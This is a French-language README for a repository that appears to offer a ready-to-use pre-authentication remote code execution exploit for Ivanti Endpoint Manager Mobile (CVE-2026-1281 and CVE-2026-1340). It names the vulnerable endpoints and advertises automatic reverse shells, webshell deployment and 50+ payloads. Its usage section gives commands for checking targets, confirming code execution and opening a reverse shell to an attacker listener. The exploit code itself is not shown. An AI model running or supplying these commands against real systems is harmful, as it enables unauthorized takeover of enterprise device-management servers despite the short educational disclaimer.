# CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

[![License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)
[![Python](https://img.shields.io/badge/python-3.8+-blue.svg)](https://www.python.org/)
[![CVSS](https://img.shields.io/badge/CVSS-9.8-critical.svg)](https://www.first.org/cvss/)

> **⚠️ DISCLAIMER:** Ce PoC est fourni uniquement à des fins éducatives et de recherche en sécurité. L'utilisation sans autorisation explicite est illégale.

## 🎯 Description

Proof of Concept (PoC) complet pour l'exploitation des vulnérabilités **CVE-2026-1281** et **CVE-2026-1340** affectant Ivanti Endpoint Manager Mobile (EPMM). Ces vulnérabilités permettent une exécution de code arbitraire à distance (RCE) sans authentification via un mécanisme de **Bash Arithmetic Expansion**.

### Vulnérabilités

- **CVE-2026-1281** : Code injection dans l'endpoint `/mifs/c/appstore/fob/`
- **CVE-2026-1340** : Code injection dans l'endpoint `/mifs/c/aftstore/fob/`
- **Score CVSS** : 9.8 (Critical)
- **Exploitation** : Active in-the-wild (Zero-Day)

## 🚀 Fonctionnalités

- ✅ Framework de validation automatisé (8 tests)
- ✅ Exploitation Pre-Auth RCE
- ✅ Reverse shell automatique
- ✅ Déploiement de webshell
- ✅ 50+ payloads prêts à l'emploi
- ✅ Scripts de détection pour Blue Team
- ✅ Documentation complète

## 📦 Installation
```bash
git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
```

## 🎯 Utilisation Rapide
```bash
# Test de vulnérabilité
python3 exploit.py -t https://target.com -c

# Validation RCE
python3 exploit.py -t https://target.com --test-rce

# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
```

## 📚 Documentation

- [README complet](README.md) - Documentation technique détaillée
- [Guide d'utilisation](GUIDE_UTILISATION_COMPLET.md) - Guide étape par étape
- [Payloads](PAYLOADS.md) - Collection de 50+ payloads
- [Guide Red Team](REDTEAM_GUIDE.md) - Scénarios opérationnels

## 🔗 Références

- [CERT-FR CERTFR-2026-ALE-001](https://www.cert.ssi.gouv.fr/alerte/CERTFR-2026-ALE-001/)
- [Watchtowr Labs Analysis](https://labs.watchtowr.com/)
- [CVE-2026-1281](https://www.cve.org/CVERecord?id=CVE-2026-1281)
- [CVE-2026-1340](https://www.cve.org/CVERecord?id=CVE-2026-1340)

## 👤 Auteur

**Mehdi Le Deaut** - Cybersecurity Consultant | Red Team Specialist

[LinkedIn](https://www.linkedin.com/in/mehdi-le-deaut-b3a802211/) 

## ⚖️ Licence

Ce projet est sous licence MIT - voir le fichier [LICENSE](LICENSE) pour plus de détails.

## 🙏 Remerciements

- CERT-FR pour l'alerte rapide
- Watchtowr Labs pour l'analyse technique
- La communauté cybersécurité
